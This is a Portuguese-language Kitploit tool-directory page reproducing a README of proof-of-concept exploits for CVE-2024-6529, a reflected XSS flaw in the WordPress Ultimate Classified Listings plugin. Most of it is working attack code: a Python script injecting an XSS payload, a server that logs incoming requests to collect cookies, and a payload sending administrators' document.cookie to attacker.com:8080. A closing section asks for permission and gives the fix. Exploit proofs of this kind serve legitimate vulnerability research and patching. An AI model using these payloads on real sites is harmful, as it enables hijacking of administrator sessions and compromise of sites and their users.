Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-6529 — Scripts de prova de conceito demonstrando XSS refletido no plugin Ultimate Classified Listings para WordPress e roubo de cookies de administrador por meio de payloads elaborados e um servidor de registro. | Kitploit
Ferramentas/GitHubGitHub/abdurahmon3236/cve-2024-6529
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPhishingTestes de PenetraçãoEngenharia Social
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Scripts de prova de conceito demonstrando XSS refletido no plugin Ultimate Classified Listings para WordPress e roubo de cookies de administrador por meio de payloads elaborados e um servidor de registro.

Ver Repositório
6há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito (PoC) para Vulnerabilidades em Plugins WordPress

Este repositório contém scripts de Prova de Conceito (PoC) para várias vulnerabilidades descobertas em diferentes plugins WordPress. Estes scripts demonstram como atacantes podem explorar essas vulnerabilidades para realizar ações maliciosas.

Índice

  • Vulnerabilidades Abrangidas
  • Configuração e Uso
    • XSS Refletido no Plugin Ultimate Classified Listings
    • Roubo de Cookies Usando XSS
  • Considerações Importantes

Vulnerabilidades Abrangidas

  1. Cross-Site Scripting (XSS) Refletido no Plugin Ultimate Classified Listings

    • Uma vulnerabilidade no plugin WordPress Ultimate Classified Listings anterior à versão 1.4 permite que atacantes executem JavaScript arbitrário injetando scripts maliciosos através de parâmetros não sanitizados.
  2. Roubo de Cookies Usando XSS

    • Demonstra como um atacante pode explorar a vulnerabilidade de XSS refletido para roubar cookies de usuários com altos privilégios, como administradores, enviando os cookies para um servidor malicioso.

Configuração e Uso

XSS Refletido no Plugin Ultimate Classified Listings

Esta PoC demonstra como explorar a vulnerabilidade de XSS refletido no plugin Ultimate Classified Listings.

  1. Identifique o Parâmetro Vulnerável:

    • Assuma que o parâmetro vulnerável é search na URL http://example.com/classifieds.
  2. Crie uma URL Maliciosa:

    • A URL maliciosa pode incluir um payload para executar um diálogo de alerta:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Execute o Script da PoC:

    • Salve o seguinte script como xss_poc.py e execute-o.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Roubo de Cookies Usando XSS

Esta PoC demonstra como um atacante pode explorar a vulnerabilidade de XSS refletido para roubar cookies de usuários com altos privilégios.

  1. Configure um Servidor Malicioso:

    • Salve o seguinte script como malicious_server.py e execute-o para iniciar um servidor que registra requisições recebidas (incluindo cookies).
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Crie um Payload para Roubar Cookies:

    • Crie um payload que envie os cookies do administrador para o servidor malicioso:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Execute o Script da PoC:

    • Salve o seguinte script como steal_cookies_poc.py e execute-o.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Considerações Importantes

  • Permissões: Certifique-se de ter permissão explícita para testar essas vulnerabilidades no site alvo. O acesso não autorizado é ilegal e antiético.
  • Ambiente de Teste: Realize esses testes em um ambiente controlado para evitar impactar sistemas em produção.
  • Mitigação: Atualize o plugin Ultimate Classified Listings para a versão 1.4 ou posterior. Sempre sanitize e escape as entradas do usuário antes de incluí-las na saída.

Estas PoCs demonstram como um atacante poderia explorar vulnerabilidades em plugins WordPress para realizar ações maliciosas. Mantenha sempre seu software atualizado e siga as melhores práticas de segurança para prevenir tais vulnerabilidades.

Baixar ferramenta